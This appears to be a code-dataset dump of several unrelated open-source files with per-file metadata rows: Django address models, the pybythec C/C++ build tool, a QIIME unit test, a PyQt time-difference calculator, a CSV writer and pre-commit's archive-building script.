# A field only used for searching addresses - this contains all the relevant fields
search_text = models.CharField(_("Search text"), max_length=1000)
class Meta:
abstract = True
def save(self, *args, **kwargs):
self._clean_fields()
self._update_search_text()
super(AbstractAddress, self).save(*args, **kwargs)
def _clean_fields(self):
"""
Clean up fields
"""
        for field in ['first_name', 'last_name', 'line1', 'line2', 'line3', 'line4', 'postcode']:
            self.__dict__[field] = self.__dict__[field].strip()
# Ensure postcodes are always uppercase
if self.postcode:
self.postcode = self.postcode.upper()
def _update_search_text(self):
search_fields = filter(lambda x: x, [self.first_name, self.last_name,
self.line1, self.line2, self.line3, self.line4, self.state,
self.postcode, self.country.name])
self.search_text = ' '.join(search_fields)
@property
def summary(self):
"""
Returns a single string summary of the address,
separating fields using commas.
"""
return u", ".join(self.active_address_fields())
def populate_alternative_model(self, address_model):
"""
For populating an address model using the matching fields
from this one.
This is used to convert a user address to a shipping address
as part of the checkout process.
"""
destination_field_names = [field.name for field in address_model._meta.fields]
for field_name in [field.name for field in self._meta.fields]:
if field_name in destination_field_names and field_name != 'id':
setattr(address_model, field_name, getattr(self, field_name))
def active_address_fields(self):
u"""
Returns the non-empty components of the address, but merging the
title, first_name and last_name into a single line.
"""
self._clean_fields()
fields = filter(lambda x: x, [self.salutation(), self.line1, self.line2, self.line3,
self.line4, self.postcode])
if self.country:
fields.append(self.country.name)
return fields
def salutation(self):
u"""Returns the salutation"""
return u" ".join([part for part in [self.title, self.first_name, self.last_name] if part])
def name(self):
"""
Returns the full name
"""
return u" ".join([part for part in [self.first_name, self.last_name] if part])
def __unicode__(self):
return self.summary
class AbstractCountry(models.Model):
"""
International Organization for Standardization (ISO) 3166-1 Country list.
"""
iso_3166_1_a2 = models.CharField(_('ISO 3166-1 alpha-2'), max_length=2, primary_key=True)
iso_3166_1_a3 = models.CharField(_('ISO 3166-1 alpha-3'), max_length=3, null=True, db_index=True)
iso_3166_1_numeric = models.PositiveSmallIntegerField(_('ISO 3166-1 numeric'), null=True, db_index=True)
name = models.CharField(_('Official name (CAPS)'), max_length=128)
printable_name = models.CharField(_('Country name'), max_length=128)
is_highlighted = models.BooleanField(default=False, db_index=True)
is_shipping_country = models.BooleanField(default=False, db_index=True)
class Meta:
abstract = True
verbose_name = _('Country')
verbose_name_plural = _('Countries')
ordering = ('-is_highlighted', 'name',)
def __unicode__(self):
return self.printable_name
class AbstractShippingAddress(AbstractAddress):
u"""
Shipping address.
A shipping address should not be edited once the order has been placed -
it should be read-only after that.
"""
phone_number = models.CharField(max_length=32, blank=True, null=True)
notes = models.TextField(blank=True, null=True, help_text="""Shipping notes""")
class Meta:
abstract = True
verbose_name_plural = "shipping addresses"
class AbstractUserAddress(AbstractShippingAddress):
"""
A user address which forms an "AddressBook" for a user.
We use a separate model to shipping and billing (even though there will be
some data duplication) because we don't want shipping/billing addresses changed
or deleted once an order has been placed. By having a separate model, we allow
users the ability to add/edit/delete from their address book without affecting
orders already placed.
"""
user = models.ForeignKey('auth.User', related_name='addresses')
# Customers can set defaults
is_default_for_shipping = models.BooleanField(default=False)
is_default_for_billing = models.BooleanField(default=False)
# We keep track of the number of times an address has been used
# as a shipping address so we can show the most popular ones
# first at the checkout.
num_orders = models.PositiveIntegerField(default=0)
# A hash is kept to try and avoid duplicate addresses being added
# to the address book.
hash = models.CharField(max_length=255, db_index=True)
date_created = models.DateTimeField(auto_now_add=True)
def generate_hash(self):
u"""Returns a hash of the address summary."""
# We use an upper-case version of the summary
return zlib.crc32(self.summary.strip().upper().encode('UTF8'))
def save(self, *args, **kwargs):
u"""Save a hash of the address fields"""
# Save a hash of the address fields so we can check whether two
# addresses are the same to avoid saving duplicates
self.hash = self.generate_hash()
super(AbstractUserAddress, self).save(*args, **kwargs)
class Meta:
abstract = True
verbose_name_plural = "User addresses"
ordering = ['-num_orders']
class AbstractBillingAddress(AbstractAddress):
class Meta:
abstract = True
verbose_name_plural = "Billing addresses"
| bsd-3-clause | -9,183,936,321,529,190,000 | 38.143564 | 108 | 0.621981 | false |
glowtree/pybythec | pybythec/__init__.py | 1 | 18150 | # -*- coding: utf-8 -*-
from pybythec import utils
from pybythec.utils import f
from pybythec.utils import PybythecError
from pybythec.BuildStatus import BuildStatus
from pybythec.BuildElements import BuildElements
import os
import sys
import time
from threading import Thread
log = utils.Logger('pybythec')
__author__ = 'glowtree'
__email__ = '[email protected]'
__version__ = '0.9.61'
def getBuildElements(osType = None,
compiler = None,
buildType = None,
binaryFormat = None,
projConfigPath = None,
globalConfigPath = None,
projConfig = None,
globalConfig = None,
currentBuild = None,
libDir = None):
'''
passthrough function that catches and reports exceptions
'''
try:
return BuildElements(
osType = osType,
compiler = compiler,
buildType = buildType,
binaryFormat = binaryFormat,
projConfig = projConfig,
projConfigPath = projConfigPath,
globalConfig = globalConfig,
globalConfigPath = globalConfigPath,
currentBuild = currentBuild,
libDir = libDir)
except PybythecError as e:
log.error(e)
return None
except Exception as e:
log.error('unknown exception: {0}', e)
return None
def build(be = None, builds = None):
'''
be: BuildElements object
builds: list of build overrides
'''
if not be:
be = getBuildElements()
if not be:
return
_runPreScript(be)
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_build(be)
def _build(be):
'''
does the dirty work of compiling and linking based on the state setup in the BuildElements object be
'''
  threading = True  # TODO: perhaps this could be a function argument
buildStatus = BuildStatus(be.targetFilename, be.buildPath)
# lock - early return
if be.locked and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('locked', '{0} is locked', be.targetName)
return True
startTime = time.time()
log.info('building ' + be.infoStr)
buildingLib = False
if be.libDir:
buildingLib = True
if not os.path.exists(be.installPath):
utils.createDirs(be.installPath)
if not os.path.exists(be.buildPath):
os.makedirs(be.buildPath)
incPathList = []
for incPath in be.incPaths:
if os.path.exists(incPath):
incPathList += ['-I', incPath]
else:
log.warning('incPath {0} doesn\'t exist', incPath)
for extIncPath in be.extIncPaths: # external include libs (for cases where 3rd party header includes are using "" instead of <> ie Unreal)
if os.path.exists(incPath):
incPathList += ['-I', extIncPath]
else:
log.warning('extIncPath {0} doesn\'t exist', extIncPath)
definesList = []
for define in be.defines:
definesList += ['-D', define]
#
# qt moc file compilation, TODO: make this another compiler option, along with asm
#
mocPaths = []
for qtClass in be.qtClasses:
found = False
mocPath = f('{0}/moc_{1}.cpp', be.buildPath, qtClass)
qtClassHeader = qtClass + '.h'
for incPath in be.incPaths: # find the header file, # TODO: should there be a separate list of headers ie be.mocIncPaths?
includePath = incPath + '/' + qtClassHeader
if not os.path.exists(includePath):
continue
      if not os.path.exists(mocPath) or float(os.stat(mocPath).st_mtime) < float(os.stat(includePath).st_mtime):
buildStatus.description = 'qt moc: ' + utils.runCmd(['moc'] + definesList + [includePath, '-o', mocPath])
if not os.path.exists(mocPath):
buildStatus.writeError(buildStatus.description)
return False
      mocPaths.append(mocPath)
      found = True
      break
if not found:
buildStatus.writeError('can\'t find {0} for qt moc compilation', qtClassHeader)
return False
for mocPath in mocPaths:
be.sources.append(mocPath)
buildStatusDeps = [] # the build status for each dependency: objs and libs
threads = []
i = 0
#
# compile
#
objPaths = []
cmd = [be.compilerCmd, be.objFlag] + incPathList + definesList + be.flags
if threading:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _compileSrc, args = (be, cmd, source, objPaths, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
else:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
_compileSrc(be, cmd, source, objPaths, buildStatusDep)
i += 1
#
# build library dependencies
#
libCmds = []
libsBuilding = []
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
libName = lib
if be.compiler.startswith('msvc'):
libCmds += [libName + be.staticExt] # you need to link against the .lib stub file even if it's ultimately a .dll that gets linked
else:
libCmds += [be.libFlag, libName]
# check if the lib has a directory for building
if threading:
for libSrcDir in be.libSrcPaths:
libSrcDir = os.path.join(libSrcDir, lib)
if os.path.exists(libSrcDir):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _buildLib, args = (be, libSrcDir, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
break
else:
for libSrcPath in be.libSrcPaths:
        if not os.path.exists(libSrcPath):
log.warning('libSrcPath {0} doesn\'t exist', libSrcPath)
continue
libSrcPath = os.path.join(libSrcPath, lib)
if os.path.exists(libSrcPath):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
          _buildLib(be, libSrcPath, buildStatusDep)
i += 1
break
# wait for all the threads before checking the results
for thread in threads:
thread.join()
allUpToDate = True
for buildStatusDep in buildStatusDeps:
if buildStatusDep.status == 'failed':
      # NOTE: changed from buildStatusDep.description.encode('ascii', 'ignore') which fixed issue on macOS
      buildStatus.writeError('{0} failed because {1} failed because...\n\n{2}\n...determined in {3} seconds\n\n', be.infoStr, buildStatusDep.name,
                             buildStatusDep.description, str(int(time.time() - startTime)))
return False
elif buildStatusDep.status == 'built':
allUpToDate = False
# revise the library paths
for i in range(len(be.libPaths)):
revisedLibPath = be.libPaths[i] + be.binaryRelPath
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
else: # try without the currentBuild leaf dir, ie 3rd party libs likely won't have them
revisedLibPath = f('{0}/{1}/{2}/{3}/{4}', be.libPaths[i], be.osType, be.buildType, be.compilerVersion, be.binaryFormat)
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
  # check for multiple instances of a lib: link errors due to linking to the wrong version of a lib can be a nightmare to debug
# if you don't suspect it's the wrong version
libsFound = {} # lib name, array of paths where it was found
for p in be.libPaths:
for lib in be.libs:
if be.compiler.startswith('msvc'):
staticPath = f('{0}/{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/{1}{2}', p, lib, be.dynamicExt)
else:
staticPath = f('{0}/lib{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/lib{1}{2}', p, lib, be.dynamicExt)
if os.path.exists(staticPath) or os.path.exists(dynamicPath):
if lib in libsFound:
libsFound[lib].append(p)
else:
libsFound[lib] = [p]
for l in libsFound:
libPaths = libsFound[l]
if len(libPaths) > 1:
      log.warning('lib {0} found in more than one place: {1}\n', l, libPaths)
#
# linking
#
linkCmd = []
if allUpToDate and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('up to date', '{0} is up to date, determined in {1} seconds\n', be.infoStr, str(int(time.time() - startTime)))
if not buildingLib:
_runPostScript(be)
return True
# microsoft's compiler / linker can only handle so many characters on the command line
msvcLinkCmdFilePath = be.buildPath + '/linkCmd'
if be.compiler.startswith('msvc'):
msvcLinkCmd = f('{0}"{1}" "{2}" {3}', be.targetFlag, be.targetInstallPath, '" "'.join(objPaths), ' '.join(libCmds))
msvcLinkCmdFp = open(msvcLinkCmdFilePath, 'w')
msvcLinkCmdFp.write(msvcLinkCmd)
msvcLinkCmdFp.close()
linkCmd += [be.linker, '@' + msvcLinkCmdFilePath]
if be.showLinkerCmds:
log.info('\nmsvcLinkCmd: {0}\n', msvcLinkCmd)
else:
linkCmd += [be.linker, be.targetFlag, be.targetInstallPath] + objPaths + libCmds
if be.binaryType != 'static': # TODO: is this the case for msvc?
linkCmd += be.linkFlags
if be.binaryType == 'exe' or be.binaryType == 'plugin' or (be.compilerRoot == 'msvc' and be.binaryType == 'dynamic'):
for libPath in be.libPaths:
if not os.path.exists(libPath):
log.warning('libPath {0} doesn\'t exist', libPath)
continue
if be.compiler.startswith('msvc'):
linkCmd += [be.libPathFlag + os.path.normpath(libPath)]
else:
linkCmd += [be.libPathFlag, os.path.normpath(libPath)]
# get the timestamp of the existing target if it exists
linked = False
targetExisted = False
oldTargetTimeStamp = None
if os.path.exists(be.targetInstallPath):
oldTargetTimeStamp = float(os.stat(be.targetInstallPath).st_mtime)
targetExisted = True
if be.showLinkerCmds:
log.info('\n{0}\n', ' '.join(linkCmd))
buildStatus.description = utils.runCmd(linkCmd)
if os.path.exists(be.targetInstallPath):
if targetExisted:
if float(os.stat(be.targetInstallPath).st_mtime) > oldTargetTimeStamp:
linked = True
else:
linked = True
if linked:
log.info('linked ' + be.infoStr)
else:
buildStatus.writeError('linking failed because {0}', buildStatus.description)
return False
# copy dynamic library dependencies to the install path
if be.copyDynamicLibs:
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
for libPath in be.libPaths:
dynamicPath = libPath + '/'
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
dynamicPath += 'lib'
dynamicPath += lib + be.dynamicExt
if os.path.exists(dynamicPath):
utils.copyfile(dynamicPath, be.installPath)
buildStatus.writeInfo('built', '{0} built {1}\ncompleted in {2} seconds\n', be.infoStr, be.targetInstallPath, str(int(time.time() - startTime)))
sys.stdout.flush()
# run a post-build script if it exists
if not buildingLib:
_runPostScript(be)
return True
#
# private functions
#
def _compileSrc(be, compileCmd, source, objPaths, buildStatus):
'''
be (in): BuildElements object
compileCmd (in): the compile command so far
source (in): the c or cpp source file to compile (every source file gets it's own object file)
objPaths (out): list of all object paths that will be passed to the linker
buildStatus (out): build status for this particular compile, defaults to failed
'''
if not os.path.exists(source):
buildStatus.writeError('{0} is missing, exiting build', source)
return
objFile = os.path.basename(source)
objFile = objFile.replace(os.path.splitext(source)[1], be.objExt)
objPath = os.path.join(be.buildPath, objFile)
objPaths.append(objPath)
# check if it's up to date
objExisted = os.path.exists(objPath)
if objExisted:
objTimestamp = float(os.stat(objPath).st_mtime)
if objTimestamp > be.latestConfigTimestamp and not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
buildStatus.status = 'up to date'
return
# if not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
# buildStatus.status = 'up to date'
# return
# Microsoft Visual C has to have the objPathFlag cuddled up directly next to the objPath - no space in between them (grrr)
if be.compiler.startswith('msvc'):
cmd = compileCmd + [source, be.objPathFlag + objPath]
else:
cmd = compileCmd + [source, be.objPathFlag, objPath]
if be.showCompilerCmds:
log.info('\n' + ' '.join(cmd) + '\n')
buildStatus.description = utils.runCmd(cmd)
if os.path.exists(objPath):
if objExisted:
if float(os.stat(objPath).st_mtime) > objTimestamp:
buildStatus.status = 'built'
else:
buildStatus.status = 'built'
if buildStatus.status == 'built':
buildStatus.description = 'compiled ' + os.path.basename(source)
else:
log.error('{0} failed to build', objPath)
def _buildLib(be, libSrcDir, buildStatus):
'''
'''
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libSrcDir)
if not libBe:
return
build(libBe)
# read the build status
buildStatus.readFromFile(libSrcDir, be.buildDir, be.binaryRelPath)
def clean(be = None, builds = None):
'''
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
return
except Exception as e:
log.error('unknown exception: {0}', e)
return
_clean(be)
def _clean(be = None):
'''
cleans the current project
be (in): BuildElements object
'''
# remove any dynamic libs that are sitting next to the exe
if os.path.exists(be.installPath) and (be.binaryType == 'exe' or be.binaryType == 'plugin'):
for fl in os.listdir(be.installPath):
libName, ext = os.path.splitext(fl)
if ext == be.dynamicExt:
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
          # str.lstrip strips a character set, not a prefix, so test explicitly
          if libName.startswith('lib'):
            libName = libName[3:]
for lib in be.libs:
if lib == libName:
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
elif ext == '.exp' or ext == '.ilk' or ext == '.lib' or ext == '.pdb': # msvc files
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
if not os.path.exists(be.buildPath): # canary in the coal mine
log.info(be.infoStr + ' already clean')
return True
dirCleared = True
for fl in os.listdir(be.buildPath):
p = be.buildPath + '/' + fl
try:
os.remove(p)
except Exception:
dirCleared = False
log.warning('failed to remove {0}', p)
if dirCleared:
os.removedirs(be.buildPath)
if os.path.exists(be.targetInstallPath):
os.remove(be.targetInstallPath)
target, ext = os.path.splitext(be.targetInstallPath)
if ext == '.dll':
try:
os.remove(target + '.exp')
os.remove(target + '.lib')
except Exception:
pass
try:
os.removedirs(be.installPath)
except Exception:
pass
log.info(be.infoStr + ' all clean')
return True
def cleanAll(be = None, builds = None):
'''
cleans both the current project and also the dependencies
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_clean(be)
# clean library dependencies
for lib in be.libs:
for libSrcPath in be.libSrcPaths:
libPath = os.path.join(libSrcPath, lib)
if os.path.exists(libPath):
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libPath)
if not libBe:
return
clean(libBe) # builds = build)
def _runPreScript(be):
'''
looks for a pre-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
preScriptPath = pathRoot + '/pybythecPre.py'
if not os.path.exists(preScriptPath):
preScriptPath = pathRoot + '/.pybythecPre.py'
if os.path.exists(preScriptPath):
import imp
m = imp.load_source('', preScriptPath)
m.run(be)
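# Usage sketch (illustrative): a project-local pybythecPre.py (or the hidden
# .pybythecPre.py variant) only needs to define run(be); it receives the
# BuildElements instance before the build begins.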
def _runPostScript(be):
'''
looks for a post-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
postScriptPath = pathRoot + '/pybythecPost.py'
if not os.path.exists(postScriptPath):
postScriptPath = pathRoot + '/.pybythecPost.py'
if os.path.exists(postScriptPath):
import imp
m = imp.load_source('', postScriptPath)
m.run(be)
| isc | 2,476,342,218,496,277,000 | 29.658784 | 146 | 0.638182 | false |
wasade/qiime | tests/test_core_microbiome.py | 1 | 4217 | #!/usr/bin/env python
# File created on 08 Jun 2012
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME project"
__credits__ = ["Greg Caporaso"]
__license__ = "GPL"
__version__ = "1.8.0-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "[email protected]"
from unittest import TestCase, main
from biom.parse import parse_biom_table
from qiime.core_microbiome import (core_observations_across_sample_ids)
class ComputeCoreMicrobiomeTests(TestCase):
""" """
def setUp(self):
""" """
self.otu_table_data1 = parse_biom_table(otu_table1)
self.otu_table_data2 = parse_biom_table(otu_table2)
def test_core_observations_across_sample_ids(self):
""" core_observations_across_sample_ids functions as expected
"""
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.)
expected = ['o1', 'o5']
self.assertEqual(actual, expected)
# fraction_for_core = 0.5
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=0.5)
expected = ['o1', 'o3', 'o5']
self.assertEqual(actual, expected)
def test_core_observations_across_sample_ids_invalid(self):
""" core_observations_across_sample_ids handles invalid input as expected
"""
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.001)
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=-0.001)
def test_core_observations_across_sample_ids_no_core(self):
"""core_observations_across_sample_ids handles filtering all obs
"""
actual = core_observations_across_sample_ids(self.otu_table_data2,
["S1", "s2", "s3", "s4"],
fraction_for_core=1.)
expected = []
self.assertEqual(actual, expected)
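# Note (illustrative): with fraction_for_core=0.5 an observation counts as
# "core" when it appears in at least half of the listed samples, which is why
# 'o3' (present only in S1 of the S1/s2 pair in otu_table1) joins the core set.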
otu_table1 = """{"rows": [{"id": "o1", "metadata": {"OTUMetaData": "Eukarya;Human"}}, {"id": "o2", "metadata": {"OTUMetaData": "Eukarya;Moose"}}, {"id": "o3", "metadata": {"OTUMetaData": "Eukarya;Galapagos Tortoise"}}, {"id": "o4", "metadata": {"OTUMetaData": "Eukarya;Bigfoot"}}, {"id": "o5", "metadata": {"OTUMetaData": "Eukarya;Chicken"}}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [0, 3, 60000.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:42:46.058411", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
otu_table2 = """{"rows": [{"id": "o1", "metadata": null}, {"id": "o2", "metadata": null}, {"id": "o3", "metadata": null}, {"id": "o4", "metadata": null}, {"id": "o5", "metadata": null}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:43:27.964500", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
if __name__ == "__main__":
main()
| gpl-2.0 | 8,308,714,476,410,311,000 | 55.986486 | 908 | 0.526678 | false |
git-commit/TardisDiff | TardisDiff.py | 1 | 4981 | import sys
import os
import inspect
from PyQt5 import QtWidgets, QtCore, QtGui
import plugnplay
from uptime import boottime
from TardisUtil import TardisOptions, TimeSubmitter
class TardisDiff(QtWidgets.QMainWindow):
def __init__(self):
super(TardisDiff, self).__init__()
self.difference = 0
self.clipboard = QtWidgets.QApplication.clipboard()
# Set hot keys
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+C"), self,
self.setClipboard)
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+T"), self,
self.notify_time_submitters)
self.options = TardisOptions()
# Get plugins
plugnplay.plugin_dirs = ['./plugins', ]
plugnplay.load_plugins()
# Get directory path
# From: http://stackoverflow.com/a/22881871/1963958
if getattr(sys, 'frozen', False): # py2exe, PyInstaller, cx_Freeze
script_path = os.path.abspath(sys.executable)
else:
script_path = inspect.getabsfile(TardisDiff)
script_path = os.path.realpath(script_path)
script_path = os.path.dirname(script_path)
# Google for a fancy tardis icon until I've made one
self.setWindowIcon(QtGui.QIcon(
os.path.join(script_path, 'icon', 'tardis-by-camilla-isabell-kasbo.ico')))
self.initUI()
def initUI(self):
# Create and initialize UI elements
self.contentWidget = QtWidgets.QWidget()
self.gridLayout = QtWidgets.QGridLayout(self.contentWidget)
self.formLayout = QtWidgets.QFormLayout()
self.timeEdit1 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEdit2 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime.setDisplayFormat("h:mm")
self.timeEditBreakTime.setCurrentSection(
QtWidgets.QDateTimeEdit.MinuteSection)
self.timeEditBreakTime.setTime(QtCore.QTime(0, 30))
self.label_timeDiffOut = QtWidgets.QLabel(self.contentWidget)
self.button_time1_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.button_time2_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.label_timeDiffOut.setText("")
self.timeEdit1.setTime(self.getStartTime())
self.timeEdit2.setTime(QtCore.QTime.currentTime())
# Add UI elements
row1 = QtWidgets.QHBoxLayout()
row1.addWidget(self.timeEdit1)
row1.addWidget(self.button_time1_now)
row2 = QtWidgets.QHBoxLayout()
row2.addWidget(self.timeEdit2)
row2.addWidget(self.button_time2_now)
self.formLayout.addRow("Time 1:", row1)
self.formLayout.addRow("Time 2:", row2)
self.formLayout.addRow("Break Time:", self.timeEditBreakTime)
self.formLayout.addRow("Difference:", self.label_timeDiffOut)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.setCentralWidget(self.contentWidget)
self.statusBar()
# connect slots
self.timeEdit1.timeChanged.connect(self.inputChanged)
self.timeEdit2.timeChanged.connect(self.inputChanged)
self.timeEditBreakTime.timeChanged.connect(self.inputChanged)
self.button_time1_now.pressed.connect(self.reset_time1)
self.button_time2_now.pressed.connect(self.reset_time2)
self.setWindowTitle('TardisDiff')
self.inputChanged()
self.show()
def inputChanged(self):
"""
Checks both time inputs and the break time
input to determine the difference.
Then calls the method to update the ui.
"""
time1 = self.timeEdit1.time()
time2 = self.timeEdit2.time()
breakTime = self.timeEditBreakTime.time().secsTo(QtCore.QTime(0, 0))
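        # secsTo() measured toward midnight yields a negative number of
        # seconds, so adding breakTime below subtracts the break from the
        # elapsed interval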
self.difference = (time1.secsTo(time2) + breakTime) / 3600
self.difference = round(self.difference, 2)
self.label_timeDiffOut.setText(str(self.difference))
def reset_time1(self):
self.timeEdit1.setTime(QtCore.QTime.currentTime())
def reset_time2(self):
self.timeEdit2.setTime(QtCore.QTime.currentTime())
def setClipboard(self):
"""Sets the current diff text to clipboard"""
self.clipboard.setText(str(self.difference))
self.statusBar().showMessage("Copied to clipboard.")
def getStartTime(self):
return TardisDiff.getBootTimeAsQTime()\
if self.options.isStartTimeAuto()\
else QtCore.QTime.fromString(self.options.getStartTime())
def notify_time_submitters(self):
TimeSubmitter.submit_time(self.difference)
@staticmethod
def getBootTimeAsQTime():
return QtCore.QDateTime(boottime()).time()
def main():
app = QtWidgets.QApplication(sys.argv)
ed = TardisDiff()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| isc | 2,382,846,917,862,565,000 | 35.094203 | 86 | 0.656495 | false |
PPKE-Bioinf/consensx.itk.ppke.hu | consensx/storage/csv.py | 1 | 1205 | class CSVBuffer(object):
"""Class which stores data for values.CSV"""
def __init__(self, my_path):
self.working_dir = my_path
self.max_resnum = -1
self.min_resnum = 100000
self.csv_data = []
def add_data(self, data):
self.csv_data.append(data)
def write_csv(self):
filename = self.working_dir + "values.csv"
output_csv = open(filename, 'w')
output_csv.write(',')
for data in self.csv_data:
output_csv.write(data["name"] + " EXP, " + data["name"] + " CALC,")
output_csv.write("\n")
for resnum in range(self.min_resnum, self.max_resnum + 1):
output_csv.write(str(resnum) + ',')
for data in self.csv_data:
exp = {}
for i in data["experimental"]:
exp[i.resnum] = i.value
try:
output_csv.write(
"{0:.2f}".format(exp[resnum]) + ',' +
"{0:.2f}".format(data["calced"][resnum]) + ','
)
except (IndexError, KeyError):
output_csv.write(',,')
output_csv.write("\n")
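# Usage sketch (illustrative): each dict handed to add_data() is expected to
# look like {"name": ..., "experimental": [objects with .resnum/.value],
# "calced": {resnum: value}}, matching the access pattern in write_csv() above.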
| mit | 8,709,585,037,877,639,000 | 31.567568 | 79 | 0.46971 | false |
philipgian/pre-commit | pre_commit/make_archives.py | 1 | 2079 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import tarfile
from pre_commit import five
from pre_commit import output
from pre_commit.util import cmd_output
from pre_commit.util import cwd
from pre_commit.util import rmtree
from pre_commit.util import tmpdir
# This is a script for generating the tarred resources for git repo
# dependencies. Currently it's just for "vendoring" ruby support packages.
REPOS = (
('rbenv', 'git://github.com/rbenv/rbenv', 'e60ad4a'),
('ruby-build', 'git://github.com/rbenv/ruby-build', '9bc9971'),
(
'ruby-download',
'git://github.com/garnieretienne/rvm-download',
'09bd7c6',
),
)
RESOURCES_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'resources')
)
def make_archive(name, repo, ref, destdir):
"""Makes an archive of a repository in the given destdir.
:param text name: Name to give the archive. For instance foo. The file
that is created will be called foo.tar.gz.
:param text repo: Repository to clone.
:param text ref: Tag/SHA/branch to check out.
:param text destdir: Directory to place archives in.
"""
output_path = os.path.join(destdir, name + '.tar.gz')
with tmpdir() as tempdir:
# Clone the repository to the temporary directory
cmd_output('git', 'clone', repo, tempdir)
with cwd(tempdir):
cmd_output('git', 'checkout', ref)
# We don't want the '.git' directory
# It adds a bunch of size to the archive and we don't use it at
# runtime
rmtree(os.path.join(tempdir, '.git'))
with tarfile.open(five.n(output_path), 'w|gz') as tf:
tf.add(tempdir, name)
return output_path
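# Usage sketch (illustrative):
#   make_archive('rbenv', 'git://github.com/rbenv/rbenv', 'e60ad4a', RESOURCES_DIR)
# clones the repo at that ref, strips its .git directory and returns the path
# to RESOURCES_DIR + '/rbenv.tar.gz'.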
def main():
for archive_name, repo, ref in REPOS:
output.write_line('Making {}.tar.gz for {}@{}'.format(
archive_name, repo, ref,
))
make_archive(archive_name, repo, ref, RESOURCES_DIR)
if __name__ == '__main__':
exit(main())
| mit | -5,814,434,410,959,443,000 | 27.875 | 76 | 0.644541 | false |
